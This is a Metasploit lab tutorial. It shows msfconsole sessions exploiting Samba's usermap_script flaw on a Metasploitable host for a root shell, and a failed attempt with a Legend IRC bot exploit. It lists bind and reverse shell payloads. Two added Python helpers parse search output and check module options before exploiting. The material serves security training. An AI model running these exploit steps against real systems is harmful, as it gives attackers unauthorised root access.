《Metasploit 魔鬼训练营》 01: First Look at Metasploit
2017-08-23 12:58
1. Using the Metasploit GUI tool armitage
In the armitage menu, choose exploits --> multi --> samba --> usermap_script. A dialog for configuring the exploit module's parameters appears; fill in RHOST to launch the attack. When it completes, run uname -a or whoami in the session to verify the result.
2. Using the msfconsole to gain control through the Samba vulnerability
root@kali:~# msfconsole
msf > help search
Usage: search [keywords]

Keywords:
  app       :  Modules that are client or server attacks
  author    :  Modules written by this author
  bid       :  Modules with a matching Bugtraq ID
  cve       :  Modules with a matching CVE ID
  edb       :  Modules with a matching Exploit-DB ID
  name      :  Modules with a matching descriptive name
  platform  :  Modules affecting this platform
  ref       :  Modules with a matching ref
  type      :  Modules of a specific type (exploit, auxiliary, or post)

Examples:
  search cve:2009 type:exploit app:client
msf > search samba
Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                      normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                            normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                          normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                         normal     Samba read_nttrans_ea_list Integer Overflow
   auxiliary/scanner/rsync/modules_list                             normal     List Rsync Modules
   auxiliary/scanner/smb/smb_uninit_cred                            normal     Samba _netr_ServerPasswordSet Uninitialized Credential State
   exploit/freebsd/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                 2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/lsa_transnames_heap         2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap          2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                  2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                     2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script              2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap           2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                    2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap       2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                   2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec  2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/fileformat/ms14_060_sandworm    2014-10-14       excellent  MS14-060 Microsoft Windows OLE Package Manager Code Execution
   exploit/windows/http/sambar6_search_results     2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig     2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   exploit/windows/smb/group_policy_startup        2015-01-26       manual     Group Policy Script Execution From Shared Resource
   post/linux/gather/enum_configs                                   normal     Linux Gather Configurations
msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
Compatible Payloads
===================

   Name                                Disclosure Date  Rank     Description
   ----                                ---------------  ----     -----------
   cmd/unix/bind_awk                                    normal   Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                  normal   Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                    normal   Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal   Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal   Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal   Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal   Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal   Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal   Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal   Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal   Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal   Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal   Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal   Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal   Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal   Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal   Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal   Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal   Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal   Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal   Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal   Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                          normal   Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_ruby                                normal   Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal   Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal   Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal   Unix Command Shell, Reverse TCP (via Zsh)
msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  139              yes       The target port (TCP)


Payload options (cmd/unix/bind_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST                   no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(usermap_script) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(usermap_script) >
msf exploit(usermap_script) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (172.16.0.132:32807 -> 172.16.0.135:4444) at 2017-08-16 08:27:37 -0400

uname -a
Linux www.metasploitable.tst 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
3. Using the msfconsole to gain control through the VNC vulnerability
msf > search vnc
Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/vnc/realvnc_41_bypass                2006-05-15       normal     RealVNC NULL Authentication Mode Bypass
   auxiliary/scanner/vnc/vnc_login                                       normal     VNC Authentication Scanner
   auxiliary/scanner/vnc/vnc_none_auth                                   normal     VNC Authentication None Detection
   auxiliary/server/capture/vnc                                          normal     Authentication Capture: VNC
   exploit/multi/misc/legend_bot_exec                   2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
   exploit/multi/vnc/vnc_keyboard_exec                  2015-07-10       great      VNC Keyboard Remote Code Execution
   exploit/windows/vnc/realvnc_client                   2001-01-29       normal     RealVNC 3.3.7 Client Buffer Overflow
   exploit/windows/vnc/ultravnc_client                  2006-04-04       normal     UltraVNC 1.0.1 Client Buffer Overflow
   exploit/windows/vnc/ultravnc_viewer_bof              2008-02-06       normal     UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow
   exploit/windows/vnc/winvnc_http_get                  2001-01-29       average    WinVNC Web Server GET Overflow
   payload/windows/vncinject/bind_hidden_ipknock_tcp                     normal     VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   payload/windows/vncinject/bind_hidden_tcp                             normal     VNC Server (Reflective Injection), Hidden Bind TCP Stager
   payload/windows/vncinject/bind_ipv6_tcp                               normal     VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   payload/windows/vncinject/bind_ipv6_tcp_uuid                          normal     VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   payload/windows/vncinject/bind_nonx_tcp                               normal     VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   payload/windows/vncinject/bind_tcp                                    normal     VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   payload/windows/vncinject/bind_tcp_rc4                                normal     VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   payload/windows/vncinject/bind_tcp_uuid                               normal     VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   payload/windows/vncinject/find_tag                                    normal     VNC Server (Reflective Injection), Find Tag Ordinal Stager
   payload/windows/vncinject/reverse_hop_http                            normal     VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   payload/windows/vncinject/reverse_http                                normal     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   payload/windows/vncinject/reverse_http_proxy_pstore                   normal     VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
   payload/windows/vncinject/reverse_ipv6_tcp                            normal     VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   payload/windows/vncinject/reverse_nonx_tcp                            normal     VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   payload/windows/vncinject/reverse_ord_tcp                             normal     VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   payload/windows/vncinject/reverse_tcp                                 normal     VNC Server (Reflective Injection), Reverse TCP Stager
   payload/windows/vncinject/reverse_tcp_allports                        normal     VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   payload/windows/vncinject/reverse_tcp_dns                             normal     VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   payload/windows/vncinject/reverse_tcp_rc4                             normal     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   payload/windows/vncinject/reverse_tcp_rc4_dns                         normal     VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   payload/windows/vncinject/reverse_tcp_uuid                            normal     VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   payload/windows/vncinject/reverse_winhttp                             normal     VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
   payload/windows/x64/vncinject/bind_ipv6_tcp                           normal     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
   payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                      normal     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
   payload/windows/x64/vncinject/bind_tcp                                normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
   payload/windows/x64/vncinject/bind_tcp_uuid                           normal     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
   payload/windows/x64/vncinject/reverse_http                            normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   payload/windows/x64/vncinject/reverse_https                           normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
   payload/windows/x64/vncinject/reverse_tcp                             normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
   payload/windows/x64/vncinject/reverse_tcp_uuid                        normal     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
   payload/windows/x64/vncinject/reverse_winhttp                         normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
   payload/windows/x64/vncinject/reverse_winhttps                        normal     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
   post/multi/gather/remmina_creds                                       normal     UNIX Gather Remmina Credentials
   post/osx/gather/enum_chicken_vnc_profile                              normal     OS X Gather Chicken of the VNC Profile
   post/windows/gather/credentials/mremote                               normal     Windows Gather mRemote Saved Password Extraction
   post/windows/gather/credentials/vnc                                   normal     Windows Gather VNC Password Extraction
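Both search listings above (search samba, search vnc) are the same fixed-format table: module name, optional disclosure date, rank, description. Reading them by eye is error-prone, and a keyword hit says nothing about what a module actually targets: search vnc returned exploit/multi/misc/legend_bot_exec, whose own description says it exploits a Perl IRC bot. The following added example (my code, not part of this post and not Metasploit's own code) parses that table into records and filters them by module type, minimum rank and a word that must appear in the description. SAMPLE_SEARCH_OUTPUT is a constructed subset of rows copied from the two listings; the rank vocabulary is Metasploit's module ranking scale.

```python
"""Parse the table printed by `msf > search <term>` and filter it.

Added example for this page, not Metasploit code. SAMPLE_SEARCH_OUTPUT is a
constructed subset of rows copied from the page's `search samba` and
`search vnc` listings.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_SEARCH_OUTPUT = """\
Matching Modules
================

   Name                                    Disclosure Date  Rank       Description
   ----                                    ---------------  ----       -----------
   auxiliary/scanner/vnc/vnc_none_auth                      normal     VNC Authentication None Detection
   exploit/multi/misc/legend_bot_exec      2015-04-27       excellent  Legend Perl IRC Bot Remote Code Execution
   exploit/multi/vnc/vnc_keyboard_exec     2015-07-10       great      VNC Keyboard Remote Code Execution
   exploit/multi/samba/usermap_script      2007-05-14       excellent  Samba "username map script" Command Execution
   payload/windows/vncinject/reverse_tcp                    normal     VNC Server (Reflective Injection), Reverse TCP Stager
   post/windows/gather/credentials/vnc                      normal     Windows Gather VNC Password Extraction
"""

# Metasploit's module ranking scale, lowest to highest.
RANKS = ["manual", "low", "average", "normal", "good", "great", "excellent"]

# One table row: name, optional YYYY-MM-DD disclosure date, rank word, description.
ROW_RE = re.compile(
    r"^\s*(\S+)\s+(?:(\d{4}-\d{2}-\d{2})\s+)?(" + "|".join(RANKS) + r")\s+(\S.*)$"
)


@dataclass
class ModuleEntry:
    name: str
    disclosure_date: Optional[str]
    rank: str
    description: str

    @property
    def module_type(self) -> str:
        """First path component: exploit, auxiliary, post, payload, ..."""
        return self.name.split("/", 1)[0]


def parse_search_output(text: str) -> List[ModuleEntry]:
    lines = text.splitlines()
    # Data rows start after the '----' underline beneath the column headers.
    start = next(i for i, l in enumerate(lines) if l.lstrip().startswith("----")) + 1
    entries = []
    for line in lines[start:]:
        if not line.strip():
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised search row: {line!r}")
        entries.append(ModuleEntry(*m.groups()))
    return entries


def filter_modules(entries, module_type=None, min_rank=None, keyword=None):
    """Narrow a listing by type (as `search type:exploit` does), by a minimum
    rank, and by a word that must appear in the description. The keyword
    check is what separates modules that target the searched service from
    ones that merely mention the term somewhere in their metadata."""
    out = []
    for e in entries:
        if module_type and e.module_type != module_type:
            continue
        if min_rank and RANKS.index(e.rank) < RANKS.index(min_rank):
            continue
        if keyword and keyword.lower() not in e.description.lower():
            continue
        out.append(e)
    return out


if __name__ == "__main__":
    rows = parse_search_output(SAMPLE_SEARCH_OUTPUT)
    for e in filter_modules(rows, module_type="exploit", keyword="vnc"):
        print(e.name, e.rank, e.disclosure_date, "-", e.description)
```

Run against the constructed sample, the exploit-plus-"vnc" filter keeps only vnc_keyboard_exec; legend_bot_exec drops out because its description never mentions VNC, which is exactly the check a reader of the transcript above would have wanted before choosing it.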
msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads
Compatible Payloads
===================

   Name                                Disclosure Date  Rank     Description
   ----                                ---------------  ----     -----------
   cmd/unix/bind_awk                                    normal   Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_lua                                    normal   Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                 normal   Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                          normal   Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                     normal   Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                   normal   Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                              normal   Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                   normal   Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                              normal   Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                    normal   Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                     normal   Unix Command, Generic Command Execution
   cmd/unix/reverse                                     normal   Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                 normal   Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                 normal   Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                              normal   Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                       normal   Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                             normal   Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                normal   Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                            normal   Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                             normal   Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                              normal   Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_ruby                                normal   Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                            normal   Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                   normal   Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                 normal   Unix Command Shell, Reverse TCP (via Zsh)
   cmd/windows/adduser                                  normal   Windows Execute net user /ADD CMD
   cmd/windows/bind_lua                                 normal   Windows Command Shell, Bind TCP (via Lua)
   cmd/windows/bind_perl                                normal   Windows Command Shell, Bind TCP (via Perl)
   cmd/windows/bind_perl_ipv6                           normal   Windows Command Shell, Bind TCP (via perl) IPv6
   cmd/windows/bind_ruby                                normal   Windows Command Shell, Bind TCP (via Ruby)
   cmd/windows/download_eval_vbs                        normal   Windows Executable Download and Evaluate VBS
   cmd/windows/download_exec_vbs                        normal   Windows Executable Download and Execute (via .vbs)
   cmd/windows/generic                                  normal   Windows Command, Generic Command Execution
   cmd/windows/reverse_lua                              normal   Windows Command Shell, Reverse TCP (via Lua)
   cmd/windows/reverse_perl                             normal   Windows Command, Double Reverse TCP Connection (via Perl)
   cmd/windows/reverse_ruby                             normal   Windows Command Shell, Reverse TCP (via Ruby)
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options
Module options (exploit/multi/misc/legend_bot_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHANNEL       #channel         yes       IRC Channel
   IRC_PASSWORD                   no        IRC Connection Password
   NICK          msf_user         yes       IRC Nickname
   RHOST                          yes       The target address
   RPORT         6667             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Legend IRC Bot
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit
[*] Started reverse TCP double handler on 172.16.0.132:4444
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Registering with the IRC Server...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Joining the #channel channel...
[*] 172.16.0.135:6667 - 172.16.0.135:6667 - Exploiting the malicious IRC bot...
[*] Exploit completed, but no session was created.

The experiment did not succeed.
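Two things in the transcript above are worth checking mechanically rather than by eye. First, the option was typed as set payloads rather than set payload; msfconsole echoed payloads => cmd/unix/bind_awk, i.e. it stored a variable of that name, and show options afterwards listed no "Payload options" section at all. Second, the first line after exploit reads "Started reverse TCP double handler", whereas the bind_awk payload chosen in section 2's style would have produced "Started bind handler" as it did there; the run therefore did not use the intended payload. The following added example (my code, not from this post and not Metasploit's own code) parses the show options table copied from the page, replays the set commands against a toy datastore, and reports those problems. The datastore rules it uses (any set KEY value is accepted under the upper-cased key; the selected payload lives under PAYLOAD; a payload's handler kind follows from the bind_/reverse prefix in its name) are assumptions modelled on what the page's transcript shows, not a reimplementation of Metasploit's datastore.

```python
"""Pre-flight check of a module datastore before `exploit`, modelled on what
`show options` and `set` do in msfconsole.

Added example for this page, not Metasploit code. OPTIONS_TABLE and
HANDLER_LINE are copied from the page's transcript for
exploit/multi/misc/legend_bot_exec; the datastore semantics below are an
assumption modelled on that transcript.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

OPTIONS_TABLE = """\
Module options (exploit/multi/misc/legend_bot_exec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CHANNEL       #channel         yes       IRC Channel
   IRC_PASSWORD                   no        IRC Connection Password
   NICK          msf_user         yes       IRC Nickname
   RHOST                          yes       The target address
   RPORT         6667             yes       The target port (TCP)
"""

# First line msfconsole printed after `exploit` in the page's section 3.
HANDLER_LINE = "[*] Started reverse TCP double handler on 172.16.0.132:4444"

# Option row: NAME, optional current setting, yes/no, description.
OPTION_RE = re.compile(r"^\s*([A-Z][A-Z0-9_]*)\s+(?:(\S+)\s+)?(yes|no)\s+(.*)$")
# Handler banner: "Started bind handler" / "Started reverse ... handler".
HANDLER_RE = re.compile(r"^\[\*\] Started (bind|reverse) .*handler")


@dataclass
class Option:
    name: str
    default: Optional[str]
    required: bool
    description: str


def parse_options_table(text: str) -> Dict[str, Option]:
    opts = {}
    for line in text.splitlines():
        m = OPTION_RE.match(line)
        if m:  # header, underline and title rows do not match the pattern
            name, default, required, desc = m.groups()
            opts[name] = Option(name, default, required == "yes", desc)
    return opts


class Datastore:
    """Toy datastore (assumption): `set key value` stores under key.upper(),
    whatever the key, which is why `set payloads ...` never touches PAYLOAD."""

    def __init__(self, options: Dict[str, Option]):
        self.options = options
        self.values = {n: o.default for n, o in options.items() if o.default}

    def set(self, key: str, value: str) -> str:
        self.values[key.upper()] = value
        return f"{key} => {value}"  # echo as msfconsole does in the transcript


def handler_kind(payload: str) -> str:
    """Listener a payload needs, from its name: bind_* listens on the target,
    reverse* connects back to a listener on the attacking host (assumption)."""
    leaf = payload.rsplit("/", 1)[-1]
    if leaf.startswith("bind"):
        return "bind"
    if leaf.startswith("reverse"):
        return "reverse"
    return "none"  # e.g. cmd/unix/generic: runs a command, no handler


def handler_from_log(line: str) -> Optional[str]:
    m = HANDLER_RE.match(line)
    return m.group(1) if m else None


def preflight(ds: Datastore, intended_payload: str, handler_line: str) -> List[str]:
    """Problems to catch before (or right after) typing `exploit`."""
    problems = []
    for name, opt in ds.options.items():
        if opt.required and not ds.values.get(name):
            problems.append(f"required option {name} is unset")
    for key in ds.values:
        if key not in ds.options and key != "PAYLOAD":
            problems.append(f"'{key}' is not a module option (typo for PAYLOAD?)")
    chosen = ds.values.get("PAYLOAD")
    if chosen != intended_payload:
        problems.append(f"PAYLOAD is {chosen!r}, not {intended_payload!r}")
    started = handler_from_log(handler_line)
    if started and started != handler_kind(intended_payload):
        problems.append(f"a {started} handler started, but {intended_payload} "
                        f"needs a {handler_kind(intended_payload)} handler")
    return problems


def replay_page_session() -> List[str]:
    """Section 3 as typed on the page: `set payloads ...`, then `set RHOST ...`."""
    ds = Datastore(parse_options_table(OPTIONS_TABLE))
    ds.set("payloads", "cmd/unix/bind_awk")
    ds.set("RHOST", "172.16.0.135")
    return preflight(ds, "cmd/unix/bind_awk", HANDLER_LINE)


def replay_corrected_session() -> List[str]:
    """Same run with the option spelled PAYLOAD, checked against a bind banner."""
    ds = Datastore(parse_options_table(OPTIONS_TABLE))
    ds.set("payload", "cmd/unix/bind_awk")
    ds.set("RHOST", "172.16.0.135")
    return preflight(ds, "cmd/unix/bind_awk", "[*] Started bind handler")
```

replay_page_session() reports the stray PAYLOADS key, the unselected payload and the bind/reverse mismatch; replay_corrected_session() reports nothing. Whether the exploit then yields a session is a separate question that depends on the target actually running the Legend IRC bot the module is written for, which the transcript does not establish.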
4. Summary of the procedure
Taking the VNC case as the example:

msf > search vnc
msf > use multi/misc/legend_bot_exec
msf exploit(legend_bot_exec) > show payloads
msf exploit(legend_bot_exec) > set payloads cmd/unix/bind_awk
payloads => cmd/unix/bind_awk
msf exploit(legend_bot_exec) > show options
msf exploit(legend_bot_exec) > set RHOST 172.16.0.135
RHOST => 172.16.0.135
msf exploit(legend_bot_exec) > exploit